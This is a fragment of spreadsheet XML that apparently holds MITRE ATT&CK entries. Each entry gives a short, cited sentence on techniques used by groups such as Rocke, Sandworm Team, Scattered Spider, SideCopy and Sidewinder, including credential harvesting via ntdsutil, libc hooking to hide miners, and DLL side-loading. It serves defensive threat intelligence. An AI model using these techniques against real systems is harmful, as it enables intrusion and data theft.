    <t>[Rocke](https://attack.mitre.org/groups/G0106) has used Python-based malware to install and spread their coinminer.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>relationship--521c66b9-fe52-4c2b-bc32-8ed3d98c7a71</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106)'s miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)	</t>
  </si>
  <si>
    <t>relationship--a1956344-1a2d-4193-bb20-0f65c98776fe</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has looked for IP addresses in the known_hosts file on the infected system and attempted to SSH into them.(Citation: Talos Rocke August 2018)	</t>
  </si>
  <si>
    <t>relationship--beae1b73-f369-4443-8e59-eb9e99665e8d</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has distributed cryptomining malware.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)</t>
  </si>
  <si>
    <t>relationship--46c37037-00da-4cf5-bde1-4296e10e6483</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>relationship--2107aab0-0191-46d1-abec-8d98ac916c21</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has spread its coinminer via SSH.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>relationship--fa69ac7a-8031-4fac-91e2-65e90f378cd1</t>
  </si>
  <si>
    <t>relationship--ffb03265-d9d6-4dc7-ba8e-71498be4e131</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106)'s miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>relationship--78fc38f6-88ee-4f26-84e1-7532d95a4fbe</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has used uname -m to collect the name and information about the infected system's kernel.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>relationship--322876d6-1b49-43d8-9e4a-590919d1f930</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has installed a systemd service script to maintain persistence.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>relationship--a430e3fa-bfc0-4ea8-8264-217f6aa015fc</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has changed the time stamp of certain files.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>relationship--ff14431c-bf82-44be-b12a-a65e88d5347a</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.(Citation: Talos Rocke August 2018)	</t>
  </si>
  <si>
    <t>relationship--31e01486-8827-41cd-a21b-dc420554d1bb</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has executed wget and curl commands to Pastebin over the HTTPS protocol.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>relationship--e8095f70-12de-4330-a293-25c4b4f22ffc</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has used Pastebin, Gitee, and GitLab for Command and Control.(Citation: Anomali Rocke March 2019)(Citation: Talos Rocke August 2018)</t>
  </si>
  <si>
    <t>relationship--29552ed5-ecfd-4a97-a6c9-d6da25181e1a</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</si>
  <si>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</si>
  <si>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relationship--d66da21d-1a8c-4b32-b700-f1d3d938b57e</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a large-scale botnet to target Small Office/Home Office (SOHO) network devices.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>relationship--40df642d-ed7f-4b05-ac08-bdc9d4f0246a</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</si>
  <si>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</si>
  <si>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relationship--c2ebda8d-2f91-440c-85b1-36fa969300a5</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.(Citation: ESET Telebots Dec 2016)</t>
  </si>
  <si>
    <t>relationship--05245120-4208-4cd1-b32e-e31e069c0d28</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</si>
  <si>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</si>
  <si>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relationship--927434d1-b487-4e3c-909d-ac8725555080</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034)'s CredRaptor tool can collect saved passwords from various internet browsers.(Citation: ESET Telebots Dec 2016)</t>
  </si>
  <si>
    <t>relationship--6930c084-c02c-4278-8343-6a47fed4fdc0</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the [BlackEnergy](https://attack.mitre.org/software/S0089) KillDisk component to overwrite files on Windows-based Human-Machine Interfaces. (Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots June 2017)</t>
  </si>
  <si>
    <t>relationship--e85a5fe7-cbfe-44b1-b297-d02f531c5fb1</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</si>
  <si>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</si>
  <si>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relationship--9e65e16c-eecc-4b8f-befa-01a5cf94ca8c</t>
  </si>
  <si>
    <t>24 February 2023</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has exfiltrated internal documents, files, and other data from compromised hosts.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--f892dddf-79a7-4d11-94b3-5df0c37d134a</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</si>
  <si>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</si>
  <si>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relationship--df98db39-fdfd-463c-96b3-e9a8b049f316</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the [BlackEnergy](https://attack.mitre.org/software/S0089) KillDisk component to corrupt the infected system's master boot record.(Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots June 2017)</t>
  </si>
  <si>
    <t>relationship--98b6dbac-dac9-4856-9b67-25c49e20448e</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t>relationship--f6cf6ad8-7a42-4cf5-82ab-45d6a5107aeb</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used stolen credentials to access administrative accounts within the domain.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--32478440-a1d2-458d-a749-e2d200415106</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) conducted technical reconnaissance of the Parliament of Georgia's official internet domain prior to its 2019 attack.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--614b4bf0-8a57-401f-a018-8217146c27d2</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</si>
  <si>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</si>
  <si>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relationship--da00bf2c-926a-45e1-a0c9-02f02a490393</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) used malware to enumerate email settings, including usernames and passwords, from the M.E.Doc application.(Citation: ESET Telebots July 2017)	</t>
  </si>
  <si>
    <t>relationship--7e6e46e1-6990-4d37-87cb-9ef6a488a8a1</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has created email accounts that mimic legitimate organizations for its spearphishing operations.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--d3ac0edb-8e56-440f-a844-be61b6045901</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has obtained valid emails addresses while conducting research against target organizations that were subsequently used in spearphishing campaigns.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--f425ddf8-fc3b-41d5-ba2e-66291ba16329</t>
  </si>
  <si>
    <t>30 November 2020</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034)'s research of potential victim organizations included the identification and collection of employee information.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--4e602d58-5a4f-417c-8b61-568e830411d1</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</si>
  <si>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</si>
  <si>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relationship--927272db-cc41-45ce-bb38-e3e37ac3a68e</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has sent system information to its C2 server using HTTP.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t>relationship--29818fd0-e6df-4871-b025-938c77978544</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</si>
  <si>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</si>
  <si>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relationship--2311db5c-218f-44f8-aa50-3e8322b79081</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</si>
  <si>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</si>
  <si>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relationship--9fd468a1-e0ef-4371-b7fd-93f81900f069</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</si>
  <si>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</si>
  <si>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relationship--3d450e48-e73f-417f-941d-85c8658f5d1f</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used backdoors that can delete files used in an attack from an infected system.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots July 2017)</t>
  </si>
  <si>
    <t>relationship--7867218e-78a0-41cf-ada0-8400285b8a1d</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has enumerated files on a compromised host.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--62f2c1a6-3019-44a0-a750-794677ddabd0</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data.(Citation: ESET Telebots Dec 2016)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--ea80c942-680d-43b4-9cbf-21f2078977ad</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a keylogger to capture keystrokes by using the SetWindowsHookEx function.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t>relationship--96c1ab08-b165-447b-afa7-5c1d30cd6219</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</si>
  <si>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</si>
  <si>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relationship--b96e67e2-7d82-478e-8bf3-2e8acf8a14dd</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</si>
  <si>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</si>
  <si>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relationship--c2d06b1b-823c-4f94-9b11-79892bca9f4e</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</si>
  <si>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</si>
  <si>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relationship--55fb787a-6622-43c7-a47d-48b4db7e8d81</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--8769bb08-b5e3-4264-95ac-6164bdbd54f3</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</si>
  <si>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</si>
  <si>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relationship--3e925289-8c29-4e14-ac5e-dd4ab927b113</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has avoided detection by naming a malicious binary explorer.exe.(Citation: ESET Telebots Dec 2016)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--fed23938-8fbc-4b67-8452-f2f413eed291</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used `ntdsutil.exe` to back up the Active Directory database, likely for credential access.(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--342fb7f0-ef23-4b17-8550-750cbe5c8723</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used intercepter-NG to sniff passwords in network traffic.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t>relationship--03f1e3ee-5c1b-4897-8631-d15ed48a0730</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used port 6789 to accept connections on the group's SSH server.(Citation: ESET BlackEnergy Jan 2016)</t>
  </si>
  <si>
    <t>relationship--759af051-f194-4a68-98af-224f7d9916e8</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used Base64 encoding within malware variants.(Citation: iSight Sandworm Oct 2014)</t>
  </si>
  <si>
    <t>relationship--c2e9f949-59a5-4e96-b0dd-0bde1a507909</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t>relationship--1d8fedc7-e139-4806-9904-3cc2bf8b9334</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</si>
  <si>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</si>
  <si>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relationship--2050b131-d5e1-419c-ad85-660fba4004d7</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</si>
  <si>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</si>
  <si>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relationship--ad949bd4-7ffd-4712-91d8-4a8523db6b50</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD.(Citation: ESET Telebots Dec 2016)(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t>relationship--42d2f7f0-9548-4bdd-9e88-7200a9e91b57</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor which could execute a supplied DLL using rundll32.exe.(Citation: ESET Telebots July 2017)	</t>
  </si>
  <si>
    <t>relationship--8e6cbb16-a5cb-4957-8654-dfde2471c3de</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has copied payloads to the `ADMIN$` share of remote systems and run &lt;code&gt;net use&lt;/code&gt; to connect to network shares.(Citation: Dragos Crashoverride 2018)(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--7ed0bce7-c9b1-4c48-9e42-930f6006fa4d</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</si>
  <si>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</si>
  <si>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relationship--fac15889-5e75-4d1d-b624-294581c299ca</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has conducted research against potential victim websites as part of its operational planning.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--bfb63eb2-7db6-45d0-83c4-1fc93a8e51c5</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has leased servers from resellers instead of leasing infrastructure directly from hosting companies to enable its operations.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--5a76872f-862b-414c-a71d-f0dc39a6c3b4</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has established social media accounts to disseminate victim internal-only documents and other sensitive data.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--12853add-45f8-4dfb-9d64-af39b1575dcf</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</si>
  <si>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</si>
  <si>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relationship--9f10e334-ae5f-4d8e-8229-64408fef1fd1</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the commercially available tool RemoteExec for agentless remote code execution.(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--3fdd32ab-646e-4ba4-96fd-165a09db0c67</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</si>
  <si>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</si>
  <si>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relationship--5259c2ae-964d-49b6-a7e7-6246e748369f</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has crafted phishing emails containing malicious hyperlinks.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--4170eaf9-9845-4f13-91b2-ff5c9931f365</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has crafted spearphishing emails with hyperlinks designed to trick unwitting recipients into revealing their account credentials.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--3954c9eb-1916-43ed-ba79-cc40d084c1a0</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool uses base64 encoding and HTML tags for the communication traffic between the C2 server.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t>relationship--185020c6-9b2a-4b08-8936-7d407ea753b4</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor to enumerate information about the infected system's operating system.(Citation: ESET Telebots July 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)	</t>
  </si>
  <si>
    <t>relationship--f7f1c7c3-192b-4675-815d-0a61b3e3a206</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</si>
  <si>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</si>
  <si>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relationship--65a16e8c-47a1-4327-8eed-5cc82339807f</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has collected the username from a compromised host.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--ef041776-abd8-4e6f-8737-07e724e68cd1</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</si>
  <si>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</si>
  <si>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relationship--59116a0e-f23b-43ec-8b25-fbad5043344a</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used dedicated network connections from one victim organization to gain unauthorized access to a separate organization.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--9528abfe-4897-4171-8e01-a0ceeb376a9a</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) have used previously acquired legitimate credentials prior to attacks.(Citation: US-CERT Ukraine Feb 2016)</t>
  </si>
  <si>
    <t>relationship--50156329-1c32-4044-9c6e-ee2eb079cd1c</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034) has created VBScripts to run an SSH server.(Citation: ESET BlackEnergy Jan 2016)(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)(Citation: Dragos Crashoverride 2018) </t>
  </si>
  <si>
    <t>relationship--e941da7d-9d23-4ada-b4ae-36f150d70087</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</si>
  <si>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</si>
  <si>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relationship--02804eca-a840-4ffe-8abd-60705d3456e4</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has scanned network infrastructure for vulnerabilities as part of its operational planning.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--105a37da-145b-4143-8641-566350cd143c</t>
  </si>
  <si>
    <t xml:space="preserve">[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool connects to the designated C2 server via HTTP.(Citation: ESET Telebots Dec 2016)	</t>
  </si>
  <si>
    <t>relationship--f6946801-949a-45e8-b99a-5f58fe119078</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used webshells including [P.A.S. Webshell](https://attack.mitre.org/software/S0598) to maintain access to victim networks.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--8a7c712a-c79d-42f2-bfbf-d38798f4c855</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) has used [Impacket](https://attack.mitre.org/software/S0357)’s WMIexec module for remote code execution and VBScript to run WMI queries.(Citation: Dragos Crashoverride 2018)(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--7dcf8536-cf47-4979-a3a2-cda656431edc</t>
  </si>
  <si>
    <t>[Scarlet Mimic](https://attack.mitre.org/groups/G0029) has used the left-to-right override character in self-extracting RAR archive spearphishing attachment file names.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--d617132e-68a7-489a-887f-1c40b147ea62</t>
  </si>
  <si>
    <t>[Scattered Spider](https://attack.mitre.org/groups/G1015) has used self-signed and stolen certificates originally issued to NVIDIA and Global Software LLC.(Citation: CrowdStrike Scattered Spider BYOVD January 2023)</t>
  </si>
  <si>
    <t>relationship--09ee94a2-db35-4932-9a77-b47364346186</t>
  </si>
  <si>
    <t>13 July 2023</t>
  </si>
  <si>
    <t>[Scattered Spider](https://attack.mitre.org/groups/G1015) has deployed a malicious kernel driver through exploitation of CVE-2015-2291 in the Intel Ethernet diagnostics driver for Windows (iqvw64.sys).(Citation: CrowdStrike Scattered Spider BYOVD January 2023)</t>
  </si>
  <si>
    <t>relationship--bfe6736d-9bda-4f6e-87f9-8e6f3364a915</t>
  </si>
  <si>
    <t>[Scattered Spider](https://attack.mitre.org/groups/G1015) has leveraged legitimate remote management tools to maintain persistent access.(Citation: CrowdStrike Scattered Spider BYOVD January 2023)</t>
  </si>
  <si>
    <t>relationship--4f7a6812-5026-47ce-9424-e6658cec5e54</t>
  </si>
  <si>
    <t>[Scattered Spider](https://attack.mitre.org/groups/G1015) has used multifactor authentication (MFA) fatigue by sending repeated MFA authentication requests to targets.(Citation: CrowdStrike Scattered Spider BYOVD January 2023)</t>
  </si>
  <si>
    <t>relationship--a3fef23a-9f22-4d7c-b9f1-3f05372e9d87</t>
  </si>
  <si>
    <t>[Scattered Spider](https://attack.mitre.org/groups/G1015) has used a combination of credential phishing and social engineering to capture one-time-password (OTP) codes.(Citation: CrowdStrike Scattered Spider BYOVD January 2023)</t>
  </si>
  <si>
    <t>relationship--0697ae7e-2008-4674-a4ab-761fd5c15b4e</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has used a malicious loader DLL file to execute the `credwiz.exe` process and side-load the malicious payload `Duser.dll`.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--b277ffdd-55fc-42fc-96c0-3bf395f04831</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has compromised domains for some of their infrastructure, including for C2 and staging malware.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--171a96b6-1680-408b-b90d-356b393a3dea</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers to download malicious payloads.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--1d2111ce-5034-472a-89a7-1818d11280fb</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has attempted to lure victims into clicking on malicious embedded archive files sent via spearphishing campaigns.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--b784a456-decb-4d3a-a789-9dd67afb6e66</t>
  </si>
  <si>
    <t>24 August 2022</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has used a legitimate DLL file name, `Duser.dll` to disguise a malicious remote access tool.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--e9b4a99d-6ddb-40bb-918a-363ddbdac448</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has utilized `mshta.exe` to execute a malicious hta file.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--ebfa4596-86bb-4a7f-a6f5-11a5642b31fd</t>
  </si>
  <si>
    <t xml:space="preserve"> [SideCopy](https://attack.mitre.org/groups/G1008) has executed malware by calling the API function `CreateProcessW`.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--612cdeba-0ca3-426f-93d3-2dd3ccca7a54</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) uses a loader DLL file to collect AV product names from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--15c71de6-bc1d-451f-8c61-a982516bb18b</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has collected browser information from a compromised host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--93d35fd7-3a55-4de1-a568-0fa50f81d594</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has sent spearphishing emails with malicious hta file attachments.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--943577e6-928e-43dd-a175-60e6046c4499</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has crafted generic lures for spam campaigns to collect emails and credentials for targeting efforts.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--cfdd9ee1-119f-4071-8498-02bb568fc778</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has identified the OS version of a compromised host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--c1c32fe3-7aba-4d58-94df-89ce60a76810</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has identified the country location of a compromised host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--139cce0b-726b-406a-ad38-1fdfc779cf57</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has identified the IP address of a compromised host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--4e3b39db-d29f-450b-b3ec-074c91af282a</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has used compromised domains to host its malicious payloads.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--5c5d1d00-1a0a-4315-9da4-2beb5f00793b</t>
  </si>
  <si>
    <t>[SideCopy](https://attack.mitre.org/groups/G1008) has sent Microsoft Office Publisher documents to victims that have embedded malicious macros that execute an hta file via calling `mshta.exe`.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--86bfc0ee-73e0-4f1b-a4f9-f8e44eae2dc3</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to automatically collect system and network configuration information.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--b5766b7d-0a7d-4bbc-8a44-211825de80db</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has configured tools to automatically send collected files to attacker controlled servers.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--3d2736f6-5ce8-48ba-8be0-e8d8ab0a3a9c</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used base64 encoding for scripts.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)</t>
  </si>
  <si>
    <t>relationship--a4e89138-7df9-4be1-9d45-4089f1744ad0</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used DLL side-loading to drop and execute malicious payloads including the hijacking of the legitimate Windows application file rekeywiz.exe.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--ff49e4df-4693-4df5-adf8-15e765963155</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used the ActiveXObject utility to create OLE objects to obtain execution through Internet Explorer.(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)</t>
  </si>
  <si>
    <t>relationship--67583965-9e89-49cd-bdac-9fd69d7857ae</t>
  </si>
  <si>
    <t>21 July 2021</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has exploited vulnerabilities to gain execution including CVE-2017-11882 and CVE-2020-0674.(Citation: ATT Sidewinder January 2021)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>relationship--0841fe7b-657e-47e9-b4c9-ec812043a41c</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used malware to collect information on files and directories.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--6cce15df-4e0c-4eac-b597-5a301d450546</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used LNK files to download remote files to the victim's network.(Citation: ATT Sidewinder January 2021)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>relationship--400ed882-80e9-47f7-85a6-11996fbbb635</t>
  </si>
  <si>
    <t>07 April 2021</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used JavaScript to drop and execute malware loaders.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder COVID-19 June 2020)</t>
  </si>
  <si>
    <t>relationship--326d0ed6-35a6-452e-a8a2-ab2a7e034faa</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has collected stolen files in a temporary folder in preparation for exfiltration.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--1bf421b0-1faf-403d-a8c6-3f5eb90d7c9d</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</si>
  <si>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</si>
  <si>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relationship--f1ef0014-9d3d-407a-aa86-8aab6c92edda</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</si>
  <si>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</si>
  <si>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relationship--d2ea2645-1940-4776-a874-09309f75636a</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has named malicious files &lt;code&gt;rekeywiz.exe&lt;/code&gt; to match the name of a legitimate Windows executable.(Citation: Rewterz Sidewinder COVID-19 June 2020)</t>
  </si>
  <si>
    <t>relationship--ccb80607-a8bf-4e6b-a3e3-1755cd317552</t>
  </si>
  <si>
